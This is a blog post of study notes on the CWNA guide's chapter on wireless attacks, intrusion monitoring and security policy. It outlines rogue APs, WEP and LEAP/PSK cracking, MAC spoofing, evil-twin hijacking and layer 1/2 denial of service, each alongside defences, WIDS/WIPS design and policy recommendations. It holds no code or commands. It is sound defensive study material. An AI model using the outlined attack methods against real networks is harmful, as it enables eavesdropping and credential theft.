CWNA Chapter 14 – Wireless Attacks, Intrusion Monitoring and Policy

My Notes from chapter 14 of the CWNA study guide

Wireless attacks

  • Rogue wireless devices
    • A potential open and unsecured gateway straight into the wired infrastructure that the company wants to protect.
    • However, what is there to prevent an individual from installing their own wireless portal onto the network backbone?
    • A rogue access point is any unauthorized Wi-Fi device that is not under the management of the proper network administrators.
    • The individuals most responsible for installing rogue access points are typically not hackers; they are employees not realizing the consequences of their actions.
    • Ad hoc wireless connections also have the potential of providing rogue access into the corporate network
    • The Ethernet connection and the Wi-Fi network interface controller (NIC) can be bridged together—an intruder might access the ad hoc wireless network and then potentially route their way to the Ethernet connection and get onto the wired network.
    • Many government agencies and corporations ban the use of ad hoc networks for this very reason.
    • On some computers, it is possible to limit the use of multiple NICs simultaneously.
    • When the user plugs an Ethernet cable into the computer, the wireless adapter is automatically disabled, eliminating the risk of an intentional or unintentional bridged network.
    • Furthermore, besides physical security, there is nothing to prevent an intruder from also connecting their own rogue access point via an Ethernet cable into any live data port provided in a wall plate.
    • If an 802.1X solution is deployed for the wireless network, it can also be used to secure the network ports on the wired network
    • In that case, any new device, including APs, would need to be authenticated to the network prior to being given access.
  • Peer-to-peer attacks
    • A commonly overlooked risk is the peer-to-peer attack
    • 802.11 client station can be configured in either Infrastructure mode or Ad Hoc mode.
    • Because an IBSS is by nature a peer-to-peer connection, any user who can connect wirelessly with another user can potentially gain access to any resource available on either computer
    • Users that are associated to the same access point are potentially just as vulnerable to peer-to-peer attacks as IBSS users.
    • Properly securing your wireless network often involves protecting authorized users from each other, because hacking at companies is often performed internally by employees.
    • In most WLAN deployments, Wi-Fi clients communicate only with devices on the wired network, such as email or web servers, and peer-to-peer communications are not needed.
    • If connections are required to other wireless peers, the traffic is routed through a layer 3 switch or other network device before passing to the desired destination station.
    • Client isolation is a feature that can often be enabled on WLAN access points or controllers to block wireless clients from communicating with other wireless clients on the same wireless VLAN
    • Some applications require peer-to-peer connectivity. Many VoWiFi phones offer push-to talk capabilities that use multicasting
  • Eavesdropping
    • 802.11 wireless networks operate in license free frequency bands, and all data transmissions travel in the open air
    • Access to wireless transmissions is available to anyone within listening range, and therefore strong encryption is mandatory
    • Wireless communications can be monitored via two eavesdropping methods:
      • Casual eavesdropping
        • Is sometimes referred to as WLAN discovery
        • Is accomplished by simply exploiting the 802.11 frame exchange methods that are clearly defined by the 802.11-2012 standard
        • Software utilities known as WLAN discovery tools exist for the purpose of finding open WLAN networks.
        • Many popular and freely available WLAN discovery software programs, such as inSSIDer, WiFiFoFum, and iStumbler, that can be used by individuals to discover wireless networks
        • WLAN discovery tools send out null probe requests across all license-free 802.11 channels with the hope of receiving probe response frames containing wireless network information, such as SSID, channel, encryption, and so on
        • WLAN discovery is typically considered harmless and in the past was referred to as wardriving
      • Malicious eavesdropping
        • The unauthorized use of 802.11 protocol analysers to capture wireless communications, is typically considered illegal
        • Most countries have laws making it illegal to listen in on any type of electromagnetic communications, including 802.11 wireless transmissions
        • Many commercial and freeware 802.11 protocol analysers exist that allow wireless network administrators to capture 802.11 traffic for the purpose of analysing and troubleshooting their own wireless networks
        • The problem is that anyone with malicious intent can also capture 802.11 traffic from any Wi-Fi network.
        • A wireless intrusion detection system (WIDS) cannot detect malicious eavesdropping
        • For this reason, a strong, dynamic encryption solution such as TKIP/RC4—or even better, CCMP/AES—is mandatory
        • Malicious eavesdropping of this nature is highly illegal.
        • Because of the passive and undetectable nature of this attack, encryption must always be implemented to provide data privacy.
        • The most common targets of malicious eavesdropping attacks are public access hotspots
  • Encryption cracking
    • The current WEP-cracking tools that are freely available on the Internet can crack WEP encryption in as little as 5 minutes
    • an attacker usually needs only to capture several hundred thousand  encrypted packets with a protocol analyser and then run the captured data through a
    • WEP-cracking software program
    • The software utility will usually then be able to derive the secret 40-bit or 104-bit key in a matter of seconds
    • After the secret key has been revealed, the attacker can decrypt any and all encrypted traffic
    • Because the attacker can decrypt the traffic, they can reassemble the data and read it as if there was no encryption whatsoever
  • Authentication attacks
    • The 802.11-2012 standard does not define which type of EAP authentication method to use, and all flavors of EAP are not created equal
    • Lightweight Extensible Authentication Protocol (LEAP), once one of the most commonly deployed 802.1X/EAP solutions, is susceptible to offline dictionary attacks.
    • The hashed password response during the LEAP authentication process is crackable
    • An attacker merely has to capture a frame exchange when a LEAP user authenticates and then run the capture fi le through an offline dictionary attack tool
    • The password can be derived in a matter of seconds. The username is also seen in cleartext during the LEAP authentication process
    • Stronger EAP authentication protocols that use tunnelled authentication are not susceptible to offline dictionary attacks
    • If an authorized WLAN portal can be compromised and the authentication credentials can be obtained, network resources are exposed
    • WPA/WPA2-Personal, also known as PSK authentication, is a weak authentication method that is vulnerable to an offline brute-force dictionary attack
    • If a hacker has the passphrase and captures the 4-Way Handshake, they can re-create the dynamic encryption keys and decrypt traffic.
    • A policy mandating very strong passphrases of 20 characters or more should always be in place whenever a WPA/WPA2-Personal solution is deployed
  • MAC spoofing
    • Usually, MAC filters are configured to apply restrictions that will allow traffic only from specific client stations to pass through.
    • Unfortunately, MAC addresses can be spoofed, or impersonated, and any amateur hacker can easily bypass any MAC filter by spoofing an allowed client station’s address
    • Because of spoofing and because of all of the administrative work involved with setting up MAC filters, MAC filtering is not considered a reliable means of security for wireless enterprise networks and should be implemented only as a last resort
  • Management interface exploits
    • Interfaces that are not used should be disabled.
    • Strong passwords should be used, and encrypted login capabilities using SSH (Secure Shell) or Hypertext Transfer Protocol Secure (HTTPS) should always be utilized.
    • It is not uncommon for attackers to use security holes left in management interfaces to reconfigure APs.
    • After gaining access via a management interface, an attacker might even be able to initiate a firmware upgrade of the wireless hardware and, while the upgrade is being performed, power off the equipment.
  • Wireless hijacking
    • Also known as the evil twin attack
    • The attacker configures access point software on a laptop, effectively turning a Wi-Fi client radio into an access point
    • The access point software is configured with the same SSID that is used by a public hotspot access point
    • The attacker then sends spoofed disassociation or deauthentication frames, forcing users associated with the hotspot AP to roam to the evil twin AP
    • At this point, the attacker has effectively hijacked wireless clients at layer 2 from the original AP.
    • The evil twin will typically be configured with a Dynamic Host Configuration Protocol (DHCP) server available to issue IP addresses to the clients
    • The attacker may also be using a second wireless NIC with their laptop to execute what is known as a man-in-the-middle attack

chapter14-1.png

  • These attacks can take another form in what is known as a Wi-Fi phishing attack. The attacker may also have web server software and captive portal software.
  • Then the attacker’s fake login page may request a credit card number from the hijacked user. Phishing attacks are common on the Internet and are now appearing at your local hotspot.
  • The only way to prevent a hijacking, man-in-the-middle, or Wi-Fi phishing attack is to use a mutual authentication solution
  • 802.1X/EAP authentication solutions require that mutual authentication credentials be exchanged before a user can be authorized. A user cannot get an IP address unless authorized; therefore, users cannot be hijacked.
  • Denial of service (DoS)
    • The attack on wireless networks that seems to receive the least amount of attention is the denial of service (DoS)
    • With the proper tools, any individual with ill intent can temporarily disable a Wi-Fi network by preventing legitimate users from accessing network resources.
    • monitoring systems exist that can detect and identify DoS attacks immediately
    • usually nothing can be done to prevent DoS attacks other than locating and removing the source of the attack.
    • DoS attacks can occur at either layer 1 or layer 2 of the OSI model. Layer 1 attacks are known as RF jamming attacks.
    • Two types of jamming attacks:
      • Intentional Jamming
        • occur when an attacker uses some type of signal generator to cause interference in the unlicensed frequency space
        • Narrowband and wideband jammers exist
        • Either causing all data to become corrupted or causing the 802.11 radios to continuously defer when performing a clear channel assessment (CCA).
      • Unintentional Jamming
        • Unintentional jamming is more common
        • from microwave ovens, cordless phones, and other devices can also cause denial of service.
        • not necessarily an attack, it can cause as much harm as an intentional jamming attack.
    • The best tool to detect any type of layer 1 interference, whether intentional or unintentional, is a spectrum analyser
    • The more common type of denial-of-service attacks that originate from hackers are layer 2 DoS attacks
    • A wide variety of layer 2 DoS attacks exist that are a result of manipulating 802.11 frames
    • most common involves spoofing disassociation or deauthentication frames.
    • Many more types of layer 2 DoS attacks exist, including association floods, authentication floods, PS-Poll floods, and virtual carrier attacks
    • management frame protection (MFP) mechanisms for the prevention of spoofing certain types of 802.11 management frames
    • A spectrum analyser is your best tool to detect a layer 1 DoS attack, and a protocol analyser or wireless IDS is your best tool to detect a layer 2 DoS attack
    • The best way to prevent any type of denial-of-service attack is physical security.
  • Vendor-specific attacks
    • Hackers often find holes in the firmware code used by specific WLAN access point and WLAN controller vendors
    • Most of these vendor-specific exploits are in the form of buffer overflow attacks.
    • Fix normally via firmware update
  • Social engineering
    • Is a technique used to manipulate people into divulging confidential information, such as computer passwords.
    • The best defence against social engineering attacks are strictly enforced policies to prevent confidential information from being shared.
    • Any information that is static is extremely susceptible to social engineering attacks

Intrusion monitoring

  • Wireless intrusion detection system (WIDS)
    • might be necessary even if there is no authorized 802.11 Wi-Fi network on site
    • After an 802.11 network is installed for access, it has become almost mandatory to also have a WIDS because of the other numerous attacks against Wi-Fi, such as DoS, hijacking, and so on.
    • The typical WIDS is a client-server model that consists of three components:
      • WIDS Server
        • is a software server or hardware server appliance acting as
        • Uses signature analysis, behaviour analysis, protocol analysis, and RF spectrum analysis to detect potential threats a central point of monitoring security and performance data collection
        • Behaviour analysis looks for 802.11 anomalies
      • Management Consoles
        • A software-based management console is used to communicate back to a WIDS server from a desktop station
        • used for administration and configuration of the server and sensors.
        • The management console can also be used for 24/7 monitoring of 802.11 wireless networks
      • Sensors (Hardware or software)
        • May be placed strategically to listen to and capture all 802.11 communications.
        • The eyes and ears of a WIDS monitoring solution
        • Basically radio devices that are in a constant listening mode as passive devices
        • Are usually hardware based and resemble an access point
        • Standalone sensors do not provide access to WLAN clients because they are configured in a listen-only mode
        • The sensors constantly scan all 14 channels in the 2.4 GHz ISM band, as well as all of the channels in the 5 GHz U-NII bands
        • Access points can also be used as part-time sensors.
        • WIDS are best at monitoring layer 2 attacks, such as MAC spoofing, disassociation attacks, and deauthentication attacks
    • Currently, three WIDS design models exist
      • Overlay
        • The most secure model
        • WIDS that is deployed on top of the existing wireless network.
        • uses an independent vendor’s WIDS and can be deployed to monitor any existing or planned WLAN
        • The overlay solution consists of a WIDS server and sensors that are not part of the WLAN solution that provides access to clients.
        • Dedicated overlay systems are not as common as they used to be as WIDS features been rolled into enterprise wireless solutions
      • Integrated
        • A centralized WLAN controller or a centralized network management server (NMS) functions as the IDS server
        • Access points can be configured in a full-time sensor-only mode or can act as part-time sensors when not transmitting as access points
        • A recommended practice would be to also deploy some APs as fulltime sensors
        • less expensive solution but may not have all the capabilities that are offered in an overlay WIDS
      • Integration Enabled
        • APs integrate software code that can be used to turn the APs into sensors that will communicate with the third-party WIDS server.
  • Wireless intrusion prevention system (WIPS)
    • Most WIDS vendors prefer to call their product a wireless intrusion prevention system
    • The reason that they prefer the term prevention systems is that they are all now capable of mitigating attacks from rogue APs and rogue clients
    • A WIPS characterizes access points and client radios in four or more classifications
      • Infrastructure Device
        • Refers to any client station or AP that is an authorized member of the company’s wireless network
      • Unknown Device
        • Is assigned automatically to any new802.11 radios that have been detected but not classified as a rogue or infrastructure device yet
      • Known Device
        • Refers to any client station or AP that is detected by the
        • The known device label is typically manually assigned by an administrator to radio devices of neighbouring businesses that are not considered a threat WIPS and whose identity is known.
      • Rogue Device
        • Refers to any client station or AP that is considered an interfering device and a potential threat
        • Most WIPS define rogue APs as devices that are actually plugged into the network backbone and are not known or managed by the organization
    • Most WIPS vendors use different terminology when classifying devices
  • Mobile WIDS
    • Laptop versions of a WIDS
    • The software program is a protocol analyser capable of decoding frames with some layer 1 analysis capabilities as well
    • Most 802.11 protocol analyser software offers standalone mobile security and performance analysis tools
    • Think of a mobile WIDS as a single sensor, server, and console built into one unit
    • One useful feature of a mobile WIDS is that it can detect a rogue AP and client and then be used to track them down
  • Spectrum analyser
    • Is a frequency domain tool that can detect any RF signal in the frequency range that is being scanned.
    • A spectrum analyser that monitors the 2.4 GHz ISM band will be able to detect both intentional jamming and unintentional jamming devices.
    • Two forms of spectrum analysis systems are available: mobile and distributed

Wireless security policy

  • General security policy
    • When establishing a wireless security policy, you must first define a general policy
    • A general wireless security policy defines the following items:
      • Statement of Authority
        • Defines who put the wireless policy in place and the executive management that backs the policy.
      • Applicable Audience
        • Audience to whom the policy applies, such as employees, visitors, and contractors.
      • Violation Reporting Procedures
        • Define how the wireless security policy will be enforced, including what actions should be taken and who is in charge of enforcement.
      • Risk Assessment and Threat Analysis
        • Defines the potential wireless security risks and threats and what the financial impact will be on the company if a successful attack occurs.
      • Security Auditing
        • Internal auditing procedures, as well as the need for independent outside audits, should also be defined.
  • Functional security policy
    • Define the technical aspects of wireless security
    • Establishes how to secure the wireless network in terms of what solutions and actions are needed
    • A functional wireless security policy will define the following items:
      • Policy Essentials
        • Basic security procedures, such as password policies, training, and proper usage of the wireless network, are policy essentials and should be defined
      • Baseline Practices
        • Define minimum wireless security practices such as configuration checklists, staging and testing procedures, etc.
      • Design and Implementation
        • The actual authentication, encryption, and segmentation solutions that are to be put in place are defined
      • Monitoring and Response
        • All wireless intrusion detection procedures and the appropriate response to alarms are defined.
  • Legislative compliance
    • In most countries, there are mandated regulations on how to protect and secure data communications within all government agencies
    • In the United States, NIST maintains the Federal Information Processing Standards (FIPS).
    • In the United States, other legislation exists for protecting information and communications in certain industries. These include the following:
      • HIPAA
        • The Health Insurance Portability and Accountability Act (HIPAA) establishes national standards for electronic healthcare transactions and national standards for providers, health insurance plans, and employers
      • Sarbanes-Oxley
        • Defines stringent controls on corporate accounting and auditing procedures with a goal of corporate responsibility and enhanced financial disclosure.
      • GLBA
        • The Gramm-Leach-Bliley Act (GLBA) requires banks and financial institutions to notify customers of policies and practices disclosing customer information
  • PCI compliance
    • The Payment Card Industry (PCI) realizes that in order to sustain continued business growth, measures must be taken to protect customer data and card numbers.
    • The PCI Security Standards Council (SSC) has implemented regulations for organizations processing and storing cardholder information.
    • commonly referred to as the PCI Standard.
    • Within this standard are components governing the use of wireless devices
  • 802.11 wireless policy recommendations
    • Although a detailed and thorough policy document should be created, it is highly recommend these six wireless security policies:
      • BYOD Policy
        • Each employer needs to define a bring your own device (BYOD) policy that clearly states how personal devices will be on boarded onto
        • the secure corporate WLAN
        • The policy should also state how the personal devices can be used while connected to the company WLAN and which corporate network resources are accessible
      • Remote-Access WLAN Policy
        • End users take their laptops and handheld devices off site and away from company grounds
        • This policy should include the required use of an IPsec or SSL VPN solution to provide device authentication, user authentication, and strong encryption of all wireless data traffic
      • Rogue AP Policy
        • No end users should ever be permitted to install their own wireless devices on the corporate network
        • This policy should be strictly enforced.
      • Ad Hoc Policy
        • End users should not be permitted to set up ad hoc or peer-to-peer networks.
      • Wireless LAN Proper Use Policy
        • This policy should include proper installation procedures, proper security implementations, and allowed application use on the wireless LAN
      • IDS Policy
        • Policies should be written defining how to properly respond to alerts generated by the wireless intrusion detection system
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s